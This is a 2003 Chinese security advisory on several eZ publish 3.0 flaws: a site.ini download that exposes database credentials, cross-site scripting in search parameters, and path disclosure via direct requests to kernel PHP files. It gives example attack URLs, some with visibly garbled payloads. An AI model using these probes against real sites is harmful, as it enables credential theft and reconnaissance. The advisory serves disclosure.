积极预防 及时发现
快速响应 力保恢复
Ez publish 存在多个缺陷 (Other,补丁)
发布时间:2003-04-17 信息来源:管理员

涉及程序: Ez publish 3.0版及其之前的版本 描述: Ez publish 存在多个缺陷 详细: Ez publish是一款开放源代码的内容管理系统。 Ez publish存在多个缺陷: ·敏感信息泄露:Ez publish存在信息泄露缺陷,能允许远程攻击者获得敏感信息,比如:数据库的名称和密码。远程攻击者通过向目标机器提供一个精心构造的下列格式的临时HTTP请求,能触发该缺陷: http:// /settings/ 攻击者能利用该缺陷下载site.ini文件,并从中获得大量敏感信息: ---- site.ini ----- DatabasePluginPath= # Use either ezmysql or ezpostgresql DatabaseImplementation=ezmysql Server=localhost User=nextgen Password=nextgen Database=nextgen # Enable slave servers # The slave servers will only be used for read queries # Useful for load balanced environments UseSlaveServer=disabled #SlaveServerArray<>=localhost #SlaverServerUser<>=nextgen #SlaverServerPassword<>=nextgen #SlaverServerDatabase<>=nextgen # The number of times to reconnect if the first fails ConnectRetries=0 Charset=iso-8859-1 # Use charset conversion routines in DB if possible UseBuiltinEncoding=true Socket=disabled SQLOutput=disabled UsePersistentConnection=disabled # Name of the site, will be used in default templates in titles. SiteName=eZ publish # URL of site, often used to link to site in emails etc. SiteURL=mysite.com # List of metadata to set in pagelayout MetaDataArray =eZ systems MetaDataArray =eZ systems MetaDataArray =Content Management System MetaDataArray =cms, publish, e-commerce, content management Dir= # Which page to show when the root index (/) is accessed IndexPage=/content/view/sitemap/2/ # What to do when a module does not exists, use either defaultpage or displayerror ErrorHandler=displayerror # Displayed if an error occurs and ErrorHandler is set to defaultpage DefaultPage=/content/view/sitemap/2/ # Default access is needed when uri type matching is done, this is # because with empty urls it`s not possible to fetch the access DefaultAccess=demo # How the login page should be handled, use embedded to show inside default pagelayout # or custom for loginpagelayout.tpl LoginPage=custom # The SSL port, the default should be OK for most sites but can be # changed if different. If the port is detect all redirects will # be done with https protocol. SSLPort=443 ------------------- ·跨站脚本执行缺陷:攻击者通过向目标机器提供精心构造的下列格式的恶意URL,能触发该缺陷: http:// /index.php/content/search/?SectionID=3&SearchText= http:// /index.php/content/advancedsearch/?SearchText= &PhraseSearchText= &SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search http:// /index.php/ /\"> < http:// /index.php/\"> 攻击者利用此缺陷能在目标机器上执行任意代码。 ·路径泄露缺陷:Ez publish 存在缺陷,远程攻击者通过向目标机器提交精心构造的下列格式的恶意HTTP请求能触发该缺陷: http:// /kernel/class/delete.php http:// /kernel/class/edit.php http:// /kernel/class/ezcontentclassfeature.php http:// /kernel/class/groupedit.php http:// /kernel/class/grouplist.php http:// /kernel/class/list.php http:// /kernel/class/removeclass.php http:// /kernel/class/removegroup.php http:// /kernel/class/classlist.php http:// /kernel/class/copy.php http:// /kernel/classes/ezorderitem.php http:// /kernel/classes/ezpersistentobject.php http:// /kernel/classes/ezpolicy.php http:// /kernel/classes/ezpolicylimitation.php http:// /kernel/classes/ezpolicylimitationvalue.php http:// /kernel/classes/ezproductcollection.php http:// /kernel/classes/ezproductcollectionitem.php http:// /kernel/classes/ezproductcollectionitemoption.php http:// /kernel/classes/ezrole.php http:// /kernel/classes/ezsearch.php http:// /kernel/classes/ezsearchlog.php 远程攻击者利用该缺陷能获得WEB root目录的全程路径和其他敏感信息。 攻击方法: 示例代码1: http:// /settings/ 示例代码2: http:// /index.php/content/search/?SectionID=3&SearchText= http:// /index.php/content/advancedsearch/?SearchText= &PhraseSearchText= &SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search http:// /index.php/ /\"> < http:// /index.php/\">